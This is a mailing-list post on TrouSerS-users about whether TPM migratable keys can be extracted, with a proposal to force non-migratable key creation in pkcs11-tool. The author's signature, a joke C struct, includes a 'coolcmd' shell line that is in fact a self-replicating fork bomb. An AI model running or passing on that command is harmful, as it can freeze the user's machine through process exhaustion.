On 15 November 2013 14:21, Dmitri Toubelis <[email protected]> wrote:
> I think your concerns are ungrounded. The way TPM works is that private key
> never leaves hardware unencrypted. This applies to migrateable key too. When
> you create a migration blob it will be encrypted inside the TPM chip with the
> public key you provide.
Right, so if I in the migration supply a public key that I have the
private key for, I have the TPM chip extract the key for me in a form
I can decrypt, correct?
The reason I want to use the TPM chip is so that a private key cannot
be copied. Not so that it cannot be copied unless I have a certain
password or key.
I don't care if the keys are actually stored in the TPM or not. But
they should not be copyable (in a usable form), and should never be
seen by CPU or RAM in a form where they could be usefully inspected.
It sounds to me like what I want to do is patch pkcs11-tool to always
use TSS_KEY_NOT_MIGRATABLE in its calls to CreateKey, and regenerate
my keys. Does that sounds like it would satisfy my requirements?
I tried making my own key generator using Tspi_ calls, but following
example code on the Internet just made Tspi_Key_CreateKey() return 1,
which is not a documented return value as seen in the manpage.
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "[email protected]" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt"; };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
------------------------------------------------------------------------------
DreamFactory - Open Source REST & JSON Services for HTML5 & Native Apps
OAuth, Users, Roles, SQL, NoSQL, BLOB Storage and External API Access
Free app hosting. Or install the open source package on any LAMP server.
Sign up and see examples for AngularJS, jQuery, Sencha Touch and Native!
http://pubads.g.doubleclick.net/gampad/clk?id=63469471&iu=/4140/ostg.clktrk
_______________________________________________
TrouSerS-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/trousers-users
